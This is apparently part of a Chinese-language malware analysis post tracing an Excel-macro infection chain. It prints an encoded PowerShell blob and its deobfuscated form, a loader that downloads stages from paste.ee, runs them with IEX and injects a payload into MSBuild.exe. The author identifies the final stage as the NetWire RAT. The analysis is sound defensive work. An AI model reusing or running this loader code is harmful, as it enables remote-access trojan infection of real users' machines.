AYwBOAGYARQBSAEUAdABpAEQAZgBvAFkATgBoAHgAaABDAFUAWgB0AE8AeABXAE0AQwBiAFAAUgBoAEkAZQBEAIAA9ACAAJwB5AFoAVgBNAE0AYQBiAHQAZwB3AFQAVABrAG4AWQB4AEwAcgBBAE4AVABlAHIAVABDAHAAbwBjAEIAdgAnADsADQAKACQAVwBHAGcAcgBkAFYAbQBnAD0AIAAkAFcARwBnAHIAZABWAG0AZwAgACsAIAAxADsAfQANAAoARgB1AG4AYwB0AGkAbwBuACAAbwB2AHEAcgBtAFMAawB5AHgAUgBQAE8AbQB1AFEAeQBRAGMAcgBzAGsAbwBRAEcATABQAGEASABUAEwAdgBxAFIAQQBWAEYATwBCAGwAewAgAHAAYQByAGEAbQAoACQAQgBYAGUAIAAsACAAJABYAEwAcQBIAHoAUgBWAFEAWgBzAGkAcgBjAHQAagB4AG0AbQBuAFAAVABpAEMASwBXAGwAegByAGwAdgAgACwAIAAkAHYARgBFAEEAbQBVAGsAQgB2AHgATwBTAGIAVAB5AEwAaQAgACwAIAAkAHkATwBPAGsATwBQAG8ASgBnAGsATgBTAGQAZgBkAFoAIAAsACAAJABsAFkAcwB4AGMAQwBrAHIAUwBGAFEAYgBxAFkAWgBRAFoAbgBnAEUASwBxAG8ATABkAG8AegBvAGMAVABpAG8AQgAgACwAIAAkAE0AbgBxAFYAVgBNAGQAcwB3AEsAWQBoAHAATQBMARABzAHcAVgBjAHYAagBnAFQAbwBEAHcAIAAsACAAJAB5AFcAYwBaAEsATABsAGEARQBSAFUAYgBTAHUAIAAsACAAJABuAHYAeQBtAEEAWgBRAHEAcgBnAEUAUgBEAEoAQgBoAEoAaABkAHkAbgB3AEkAZgBCAEIAIAAsACAAJAB6AGEAYwB1AEsAQQBGAHMAWQBxAFEAdwBwAGkAZwBrAHMARgB0AGkAUQBEAGsATAApAA0ACgAkAGYAeABzAFIAUgBXAEcATABkAGoAQQBhAHQAVABKAEEAZgBrAGcAWABzACAAPQAgACcAZQBsAFYAWQB4AG0AWQBMAGoAUAByAFQATQBuAHYAegBvAHAASgBQAGUAagBMAFYAeAAnADsADQAKACQAcQBWAFoAZQBWAE8AZgBDAFMARwB2AHMAWQBUAG0AUgBBAGsAagBaAEgAVgBFAGcAdgByAE4AZAB5AHYAWgBBAGIAegB2AEQAbQBFAHUAZABvAEoAIAA9ACAAJwBwAEQAdwBRAHAAYwBOAGoAYQBtAFgAcQBWAFEAdABqAGQAQQAnADsADQAKACQARQBYAGcAIAA9ACAAJwBSAFkAWABpAGUAdgBxAEcAbAB4AEEAUABjAHoAYQBZAEEAbABMAHkATgBFAEoAYQBuAHQAVgBRAGMAbQBGAHgASQBIAGYAcwBSAHUAaQBuACcAOwANAAoAJABmAG0AcwBVAEIAUQBrAEQAYwBCAFQATABoAGgATQBQAHgAdgBsAGEAYQBkAHkAcwBEAEcAVQBUAGkARwBGACAAPQAgACcAWQBPAGkAUgAnADsADQAKACQARgBsAGMAbABNAEEAawBsAGwAYgBhAFMAYwBVACAAPQAgACcAdwBNAEoAQwBEAUgB2AHYAUQBVAFYAdgBRAG0AUwB6AHYAegBzAEoASgBwAE4AZABPAEcAUgBlAHUAQgBHAG0ARwBHAE0ARgBmAGUAUABvAHEAZwAnADsADQAKACQAcwBlAG8AVgB5AEkAYQBYAGMAYgBxAG4AVwB3AFoAWgB0AHoAIAA9ACAAJwBCAE8ATwBqAHAASwBhAE4AVABRAGoARQBTAGMAVgAnADsADQAKACQAeQBaAGwAVABXAFQAZQBkAEsAUQBTAHAASgBHAEYAVwBvAFoAZgAgAD0AIAAnAGQAdgB6AEsAWQB1ACcAOwANAAoAJABHAHQAWABYAEwAQgBhACAAPQAgACcAegBIAGcAdQBoAGsAbABaAFoAcgBsAEUATgBLAE4AUAB0AHcAUABzAEQAWgBiACcAOwANAAoAJABiAE4AWABrAG0AcwBIAG4AaQBmAEYAUABIAGYAeQBVAHIAVwBhAFMAbQBwAHMAdwBnAEgAZQBPAG0AaQBYAGEAZwBsAFMAVABOAEIAbQAgAD0AIAAnAGsAeABXAGkARQB4AEgATgB5AHUAQQBoAHoASQBJAG0AVQBiAEQAZgBPAHQAQgBBAEgAZgBpAFcAJwA7AA0ACgAkAGUASABxAGsAdQBpAG8AVABLAHIAaQBBACAAPQAgACcAUQByAGgAcQBhAFgAZABnAHoAbQB4AEcAUgByAHcAJwA7AA0ACgAkAGEAWgBQAGwAQQBUAG4ASgB4AEYAWgBUAFMASgBqAFYAZgB5AGMAIAA9ACAAJwBTAFIARgBLAHQAZwBlAFYAcwAnADsADQAKACQAYwByAHIAeABrAFMAVABPAFAAdwBFAFkAcwBWAHkASgBOAHEAQwBjAGIAUwBPAG4ARAAgAD0AIAAnAFUARQBzAFUAbwBTAFIAVQAnADsADQAKACQAaQBiAFYAWQBSAEMAUQBqAGYARQB1AFkAagBNAGoAUwBvAFMAUQBCAEoAYwBEAHQAYwAgAD0AIAAnAE8AVwB1AEkAbQBHAFkAcwBQAGgAcwBSAGsAWgBMAGoAagBqAEoAagBrAHIASgBDAEEAegBBAFQAUwBGAFgAYgB3AFQAbgB1AHAAWABTAG4AQQByACcAOwANAAoAJABCAFoAWABpAHEAcABhAHQAVQBrAHMATgBYAE0AcwBJAG4ARwBGAFoASgBKAFIAVQBRAG0AUQB1AEwAUgBWAGoAdAB1AEgAYwBjAFEASgBkAHMAIAA9ACAAJwBEAHIARABHAFEAaAB3AFAAZQBoAHUAJwA7AA0ACgB9AA0ACgAkAG4AcgBJAEMAUgBFAFkAZwBoAEQATwBKAFUAYwBGAFAAIAA9ACAAJwBXAHcAYwBoAHgARwBhAFEASwBWAGoAeAB3AG0AbwBvAGIASABQAFUAYQB6AEYARQBMAGUAegAnADsADQAKAEYAdQBuAGMAdABpAG8AbgAgAGoASABmAE8AVgBtAEEAdQBBAFIAbQBrAHEASQBBAHgATQBHAEgAawBVAFYAYgBBAHsAIABwAGEAcgBhAG0AKAAkAHUAbABuAGIAaABrAEkAawBTAGoAcABsAGgAbABHAGkAcABqAGwAUgBaAFUAcwBWAHAAIAAsACAAJABFAFgAcgBYAFYAVABIAHgAVwBZAGkASABRAE0AZQBEAFcAcgBSAGUAbQBvAHMAVwBPAGMAcwBoAEMAWgB0AFMAbQBsAGYAbAB0AHUATwBXACAALAAgACQAawBQAGkAQQBoAFMAWQBuAFcAeQBBAEQATABJAFAAZQBVAEkAdABhAFoAdQB3AGYAUAAgACwAIAAkAGUAaAB0AEoAYwBkAHYAQgBDAFoASwBXAGcASgBUAHUAZwBiAHMAIAAsACAAJABhAGQAUABHAFoAbABWAHYARABwAFMAQwBsACAALAAgACQAbwByAHUATQBXAFcASQBLAEcAcQBVAHkAKQANAAoAJABGAFcARwBRAFcAWgBtAGIASgBsAG8AWQBiAHgAUABrAFIAbgAgAD0AIAAnAEgAYwBmAE4ASQBNAHQAagBNAE4ASABPAGYAZQB0AFAAUQB1AGUAZQBzAEEASQAnADsADQAKACQAWABMAFkAbABKAHIAQQBDAGgAQgBzAHIAWgBJAHgARQBkAHAAWgBOAEMAWABJAHUAaABoAHoAcAAgAD0AIAAnAEoAaABIAFQAeQBxAHcAbgBJAGEAVQBNAEUAZwBkAGwAQwBwAEkAdwBaAEIAQwBhAHUAZgB6AEQAZQBFAGIAcwBLAE8AJwA7AA0ACgAkAFQAbABZAGIAUgBCAFEAVQBQAEYAQgB4AHEAZQBJAGYAcwBxAHMATgBJACAAPQAgACcAaABZAFQAcgB0AEkARQB5AGIAQwBxAEoASwBBAGQATwByAHYASgBnAG4AVQB0AGgASgBZACcAOwANAAoAJABZAGoAQgBSAEEAUABvAEUAegBJAFoASQBIAFEAUQBkAHoARwBoACAAPQAgACcASQBCAGUAegB4AEUAYwByAE0AZQBsAGkAVQBtAGYAUABhAGsAJwA7AA0ACgB9AA0ACgAkAHIAZQBnACAAPQAgACgAJwB7ADIAfQB7ADAAfQB7ADEAfQB7ADMAfQAnAC0AZgAnAGQAUwB0ACcALAAnAHIAaQBuACcALAAcIGAARABgAG8AYAB3AG4AYABsAGAAbwBhAB0gLAAnAGcAJwApADsAWwB2AG8AaQBkAF0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAFcAaQB0AGgAUABhAHIAdABpAGEAbABOAGEAbQBlACgAJwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAnACkAOwAkAGYAagA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AZQA0ADkAdQAwACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAEAAQAAiACwAIAAiADQANAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAgACIANwA4ACIAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBkAGwATwBNAHoAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAawAgAYQBjAGsAaQB0AHUAcABdADoAOgBlAHgAZQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA= | &('I'+'EX')

进一步解码得到，解混淆后的PowerShell脚本内容。

仔细阅读脚本内容后，发现前面是垃圾代码与增加延时，最后是通过调用CallByName下载下一阶段内容执行。
地址//paste.ee/r/e49u0，//paste.ee/r/dlOMz。

Function ZhZg{ param($xIxfmTFLHvQRN , $GPtEltKSlSBIDwArOphrhFygxx , $qfjydzoRxRgPADeXfddPJKQhakVwARMHovTnCTXIPf)
$DiSCThogPCXterQgFZbEkrVLGUAeHqzAD = 'tSyJnGHnXzweeXOWUIycCLNHwyhKY';
$CWpvyyivlUxxUVObqdPlWq = 'bfi';
$rMoZw = 'yxapiZPoYWefF';
$rsVIEumCLUOQPuqjwvAiVYomHDAxyTXwZrMy = 'gVBbwlGbSJVxoajeWVTDiBAupDrwRqXhsrQZy';
$YmiLoue = 'Jt';
$RCWtvJeVHmstJJbloFxJJgQwgVWMGQpuyH = 'oB';
}
$ximErUgtYCNIquMkflmZMZmROrwyvCInjA = 'OXEovQnx';
If ('zxZuiObPBcbXwUpzYi' -eq 'VtaYqmxMbwrJZcRSRRBPgatlHYkSCOoXhobbYZjHkB') {
$SK = 'CveCYiWSRvzoQRCfK';
$HTbkAqtrhuff = 'bbpVpoApGBPWfbjIRFFqnLq';
$SunIhAcnlVYNbwNrJXASMNVPJiQoaomPkxDu = 'sI';
$YclKCW = 'UsNgQKXeEZYyyknMwiIcdtSrROvt';
$cKMnBvwMIWFMTyVbtKVlPobutDbZWOB = 'dubOMKwpqAoLDP';
$vwPYEaIUoi = 'txTXptVqiYWHOiNf';
}
$PzQqetgcHqxoVanfuRyVTKvqMglYpApquOEpSaP = 'nuiCX';
DO{
$ZbtSLTmpNgYbknzltwSwgGbBQHGdk = 'APUbBdKGSdURaa';
$gJTVMTXjxBSzrCDMJFygIGIlW = 'ndobOgBYkxnHXvdgXZidSDP';
$LMbtUZAhzlgtuVnm = 'TSGZBhDCcjiDsIjOXQCEIEKwFIlPjlBmvfzlIsJeYr';
$qSeGdxeXFkipPHJTswnSrhwHNJxFeGYgQMTeb = 'ISF';
$wBNpjezYQikY = 'JV';
$sTzYtyMBZDnerqnVNdku = 'XZTGFqqvsLKIFJoSgUyoLQgqVhauOKWYbcUugSn';
$Nyi= $Nyi + 1;} While ($Nyi -ne 6)
While ($WGgrdVmg -ne 6) {
$DgJmFiHtclYPvgholhcoulNhqSFkoNzutuLdNmVuNBD = 'OsaZyCsoJsFRTcvncXEPleWBVEbyL';
$WGgrdVmg= $WGgrdVmg + 1;$atifTxrflmVLkAptKkriRqwowjWZD = 'atcbRLjnJxvxlSuatVLctrHdRkwtjjbSbrLbiJj';
$WGgrdVmg= $WGgrdVmg + 1;$JWbtmTEetVqAObAjmzJgPpDZWd = 'tHSrkmhSWPNqxfRzOtb';
$WGgrdVmg= $WGgrdVmg + 1;$zrbp = 'zCOUTBXJyLXbdFOhJdUYIMAyqpgvZV';
$WGgrdVmg= $WGgrdVmg + 1;$fdI = 'jTyDNqgyUuYknMWqNHQanBQdeUbjcIs';
$WGgrdVmg= $WGgrdVmg + 1;$VVfOLaGhcNfEREtiDfoYNhxhCUZtOxWMCbPRhIenA = 'yZVMMabtgwTTknYxLrANTerTCpocBv';
$WGgrdVmg= $WGgrdVmg + 1;}
Function ovqrmSkyxRPOmuQyQcrskoQGLPaHTLvqRAVFOBl{ param($BXe , $XLqHzRVQZsirctjxmmnPTiCKWlzrlv , $vFEAmUkBvxOSbTyLi , $yOOkOPoJgkNSdfdZ , $lYsxcCkrSFQbqYZQZngEKqoLdozocTioB , $MnqVVMdswKYhpMnCDswVcvjgToDw , $yWcZKLlaERUbSu , $nvymAZQqrgERDJBhJhdynwIfBB , $zacuKAFsYqQwpigksFtiQDkL)
$fxsRRWGLdjAatTJAfkgXs = 'elVYxmYLjPrTMnvzopJPejLVx';
$qVZeVOfCSGvsYTmRAkjZHVEgvrNdyvZAbzvDmEudoJ = 'pDwQpcNjamXqVQtjdA';
$EXg = 'RYXievqGlxAPczaYAlLyNEJantVQcmFxIHfsRuin';
$fmsUBQkDcBTLhhMPxvlaadysDGUTiGF = 'YOiR';
$FlclMAkllbaScU = 'wMJCnARvvQUVvQmSzvzsJJpNdOGReuBGmGGMFfePoqg';
$seoVyIaXcbqnWwZZtz = 'BOOjpKaNTQjEScV';
$yZlTWTedKQSpJGFWoZf = 'dvzKYu';
$GtXXLBa = 'zHguhklZZrlENKNPtwPsDZb';
$bNXkmsHnifFPHfyUrWaSmpswgHeOmiXaglSTNBm = 'kxWiExHNyuAhzIImUbDfOtBAHfiW';
$eHqkuioTKriA = 'QrhqaXdgzmxGRrw';
$aZPlATnJxFZTSJjVfyc = 'SRFKtgeVs';
$crrxkSTOPwEYsVyJNqCcbSOnD = 'UEsUoSRU';
$ibVYRCQjfEuYjMjSoSQBJcDtc = 'OWuImGYsPhsRkZLjjjJjkrJCAzATSFXbwTnupXSnAr';
$BZXiqpatUksNXMsInGFZJJRUQmQuLRVjtuHccQJds = 'DrDGQhwPehu';
}
$nrICREYghDOJUcFP = 'WwchxGaQKVjxwmoobHPUazFELez';
Function jHfOVmAuARmkqIAxMGHkUVbA{ param($ulnbhkIkSjplhlGipjlRZUsVp , $EXrXVTHxWYiHQMeDWrRemosWOcshCZtSmlfltuOW , $kPiAhSYnWyADLIPeUItaZuwfP , $ehtJcdvBCZKWgJTugbs , $adPGZlVvDpSCl , $oruMWWIKGqUy)
$FWGQWZmbJloYbxPkRn = 'HcfNIMtjMNHOfetPQueesAI';
$XLYlJrAChBsrZIxEdpZNCXIuhhzp = 'JhHTyqwnIaUMEgdlCpIwZBCaufzDeEbsKO';
$TlYbRBQUPFBxqeIfsqsNI = 'hYTrtIEybCqJKAdOrvJgnUthJY';
$YjBRAPoEzIZIHQQdzGh = 'IBezxEcrMeliUmfPak';
}
$reg = ('{2}{0}{1}{3}'-f'dSt','rin', `D`o`wn`l`oa ,'g');
[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');
$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object  `N`e`T`.`W`e`B`C`l`i`e`N`T ),$reg,[Microsoft.VisualBasic.CallType]::Method,'htt'+[Char]80+'' + [Char]58 + '//paste.ee/r/e49u0').Replace("@@", "44").Replace("!", "78")|IEX;
[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object  `N`e`T`.`W`e`B`C`l`i`e`N`T ),$reg,[Microsoft.VisualBasic.CallType]::Method,'htt'+[Char]80+'s' + [Char]58 + '//paste.ee/r/dlOMz').replace('$$','0x')|IEX;
[k.Hackitup]::exe('MSBuild.exe',$f)

下载到第一个经解码后的文件，不过是已经经过处理得到的dll文件。

实际名称为Hackitup，如下可大致判断出后续会进行进程注入，结合上述的解码脚本内容，可发现注入的进程为MSBuild.exe。

下载到第二个文件，简单分析为NetWire RAT远控木马。

C2肯定已经失效了，但是也贴一下吧。

参考链接

• https://www.virustotal.com/gui/file/67fd76d01ab06d4e9890b8a18625436fa92a6d0779a3fe111ca13fcd1fe68cb2/details

• https://app.any.run/tasks/b37be5b0-1460-4dd1-992e-72ec74cec8fe/

• https://app.any.run/tasks/25084eac-2823-4887-8f90-42623b01c2ae/

• https://app.any.run/tasks/0ddc9dc1-0ff9-43c7-b456-35a296998809/

• https://www.freebuf.com/articles/others-articles/236919.html

• https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/

• https://zeronohacker.com/analysis-excel-4-0-marco-from-field-office-sample.html

• https://www.jianshu.com/p/d2bab95ec62c